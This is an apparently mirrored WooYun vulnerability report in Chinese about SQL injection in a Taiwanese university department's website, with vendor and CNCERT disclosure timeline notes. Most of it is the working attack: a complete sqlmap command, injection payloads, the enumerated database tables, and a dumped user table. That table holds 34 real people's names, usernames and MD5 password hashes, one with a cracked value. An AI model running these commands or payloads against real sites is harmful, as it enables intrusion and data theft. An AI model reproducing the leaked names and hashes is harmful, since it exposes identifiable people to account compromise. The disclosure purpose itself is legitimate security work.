乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-15: 细节已通知厂商并且等待厂商处理中 2015-10-19: 厂商已经确认,细节仅向厂商公开 2015-10-29: 细节向核心白帽子及相关领域专家公开 2015-11-08: 细节向普通白帽子公开 2015-11-18: 细节向实习白帽子公开 2015-12-03: 细节向公众公开
台湾国立成功大学某分站存在SQL注射漏洞(多名用户姓名及密码泄露)
使用sqlmap进行测试,测试地址:http://**.**.**.**/modules.php?page=%E5%AE%A2%E5%BA%A7%E6%95%99%E6%8E%88
python sqlmap.py -u "http://**.**.**.**/modules.php?page=%E5%AE%A2%E5%BA%A7%E6%95%99%E6%8E%88" -p page --technique=BEU --random-agent -D geomatics -T user -C id,name,pswd,key --dump
---Parameter: page (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: page=%E5%AE%A2%E5%BA%A7%E6%95%99%E6%8E%88' AND 3059=3059 AND 'NSah'='NSah Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: page=%E5%AE%A2%E5%BA%A7%E6%95%99%E6%8E%88' AND (SELECT 9328 FROM(SELECT COUNT(*),CONCAT(0x717a706a71,(SELECT (ELT(9328=9328,1))),0x716b706271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'zkUS'='zkUS Type: UNION query Title: Generic UNION query (NULL) - 9 columns Payload: page=%E5%AE%A2%E5%BA%A7%E6%95%99%E6%8E%88' UNION ALL SELECT NULL,NULL,CONCAT(0x717a706a71,0x626c5557484e7970756d,0x716b706271),NULL,NULL,NULL,NULL,NULL,NULL-- ---web server operating system: Linux Ubuntuweb application technology: Apache 2.4.7, PHP 5.5.9back-end DBMS: MySQL 5.0
web server operating system: Linux Ubuntuweb application technology: Apache 2.4.7, PHP 5.5.9back-end DBMS: MySQL 5.0available databases [2]:[*] geomatics[*] information_schema
Database: geomatics[32 tables]+----------------------+| alumni-bak || user || alumni || bbs || blockip || files || filesII || filesIII || graduation_photo || ieet_course_pdf_file || ieet_course_pdf_type || invite || invite_count || lesson || lessoneng || log || menubar || news || newsII || newsIII || news_class || page || paper || source || sys_log || teacher || teacher_data || teacher_memo || teacher_position || thesis || user_group || user_group_weight |+----------------------+
Database: geomaticsTable: user[12 columns]+------------+----------+| Column | Type |+------------+----------+| group | int(11) || key | int(11) || level | int(11) || order | int(11) || changeable | int(11) || id | text || lcount | int(11) || ltime | datetime || name | text || note | text || pswd | text || tid | int(11) |+------------+----------+
Database: geomaticsTable: user[34 entries]+---------------+-------+----------------+-----------------------------------------+| id | key | name | pswd |+---------------+-------+----------------+-----------------------------------------+| chauo | 34 | chauo | 3af820143be07a2c581437b1c0f564c5 || chikuei | 12 | 王驥魁 | 21f61e1b0d850dc1c9ce2c68fa7bb774 || choying | 16 | 黃倬英 | a219530c884cccd99fd2fc77259c56e8 || El-Sheimy | 22 | El-Sheimy, N. | 70ae4f91fb675276e44f6218ffa8e633 || Fu-Lai | 26 | 謝福來 | 3e581498f4d125835f59ee469b72de01 || Gong | 23 | 宮 鵬 | e75c653a40ce549028f13c59842564c1 || Habib | 25 | Habib, A. F. | 8ffe6a68c4c44ebeae10afce5ceab4a3 || Hone-Jay | 33 | 朱宏杰 | 107030ca685076c0ed5e054e2c3ed940 (5454) || hsuehchan | 37 | 呂學展 | de66bfdf3f9599c18be3e6b2d986bcd6 || ieet | 35 | ieet | 21824e886cca260c49c52cae76dc4c38 || ieet_download | 36 | ieet_download | d10000c4556835880a948b9407668cb8 || jingkuen | 32 | 景國恩 | afbcb58af6f9963c979f86dae2fd98e8 || Jong-Sen | 21 | 李仲森 | b938c25f73a4b6e7c05eae4a983a7f7a || junghong | 8 | 洪榮宏 | 504188a10fa2c3c23d0c4d8d5d01bea2 || jyrau | 15 | 饒見有 | f16bf012637a332f3d68c1041c99c934 || Kuo70 | 14 | 郭重言 | 80b468a48cb147a3aa0aec62a89cf611 || kwchiang | 11 | 江凱偉 | 753e82e8792aba40818bfb06cc78434a || lily | 29 | 王麗鍾 | 68ceb34353224fb2d6470e900df893a2 || linhung | 13 | 林昭宏 | 08c0f6ca9b57573fe0a087f8d654e2d0 || mengyl | 31 | 李孟穎 | 7afeddd9387b18e2f92b1e7f4fbc2600 || myang | 7 | 楊 名 | 0810ce3af6943e589f5f1f35096a569a || Philpot | 24 | Philpot, W. D. | 23f1d819039cb797a21cf705a93972a8 || Ren-Sian | 27 | 范仁賢 | edaf76c8fefdc0fde8bee360fa8cab9c || rjyou | 9 | 尤睿哲 | 70b221f37f39c4b35e32e647b70df501 || seven | 30 | 劉家彰 | 613415bb79b4df0de83fa4034e973a70 || Shum | 20 | 沈嗣鈞 | 7b5d38351d82d401f69fd6e2f2295d69 || slanla | 1 | 陳俊元 | 3af820143be07a2c581437b1c0f564c5 || tsayjr | 10 | 蔡展榮 | 43601a506399bdfb195afb367bfe2d06 || tseng | 6 | 曾義星 | 97989d9be0072f8a3b3b68fe0dcf501b || tseng56 | 19 | 曾宏正 | 77cd64f7f170d78de1dc802b9e3efaf2 || ycliao | 5 | 廖揚清 | 4522584307a3594339d4aff8a21ef431 || yujyh | 17 | 余致義 | 44fb2ddc3d29d9775e69c0e2cfb471cd || yungfush | 18 | 施永富 | 018e1717eee624c36a2bfb7dbcf52754 || z10408022 | 38 | 張秀雯 | c41782e53c669e5dc69a3a72f6cc504d |+---------------+-------+----------------+-----------------------------------------+
增加过滤。
危害等级:中
漏洞Rank:9
确认时间:2015-10-19 18:17
CNVD确认并复现所述情况,已经转由CNCERT向TWNCERT通报,由其后续协调网站管理单位处置.
暂无